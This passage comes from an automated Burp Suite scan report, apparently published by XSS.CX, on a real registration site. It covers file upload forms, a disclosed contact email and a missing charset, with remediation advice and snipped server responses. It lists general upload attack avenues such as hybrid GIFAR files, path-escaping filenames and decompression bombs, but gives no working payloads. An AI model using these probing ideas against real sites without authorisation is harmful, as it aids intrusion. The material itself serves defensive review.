Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

7.1. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&Seq=1

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:08 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 13:54:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 88384
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Regis
...[SNIP]...
<br>
Upload your exemption documentation here:
<input id="TaxExemptUpload" type="file" name="%%File.88256c0700601e09.c16f7528e0448e238825739800821c1b.$Body.1.EA7A"><br>
...[SNIP]...

7.2. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&Seq=1&AccountType=Trial

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:49 GMT
Last-Modified: Thu, 28 Apr 2011 13:41:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 89922
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Regis
...[SNIP]...
<br>
Upload your exemption documentation here:
<input id="TaxExemptUpload" type="file" name="%%File.88256c0700601e09.c16f7528e0448e238825739800821c1b.$Body.1.EA7A"><br>
...[SNIP]...

8. Email addresses disclosed previous next
There are 2 instances of this issue:

/KnowledgeLeader/Registration.nsf/Registration
/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

8.1. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration

Issue detail

The following email address was disclosed in the response:

knowledgeleader@protiviti.com

Request

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:08 GMT
Connection: close
Last-Modified: Thu, 28 Apr 2011 13:54:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 88384
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Regis
...[SNIP]...
<font face="Arial">Please add knowledgeleader@protiviti.com to your contact list so these messages will not be blocked.</font>
...[SNIP]...

8.2. http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial

Issue detail

The following email address was disclosed in the response:

knowledgeleader@protiviti.com

Request

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:41:49 GMT
Last-Modified: Thu, 28 Apr 2011 13:41:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 89922
Expires: 0
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<LINK REL="STYLESHEET" type="text/css" href="/KnowledgeLeader/GlobalStyle.css"><title>KnowledgeLeader Registration - Regis
...[SNIP]...
<font face="Arial">Please add knowledgeleader@protiviti.com to your contact list so these messages will not be blocked.</font>
...[SNIP]...

9. HTML does not specify charset previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Registration.nsf/Forgot%20Password!OpenForm&Seq=1

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

Response

Report generated by XSS.CX at Thu Apr 28 10:41:22 CDT 2011.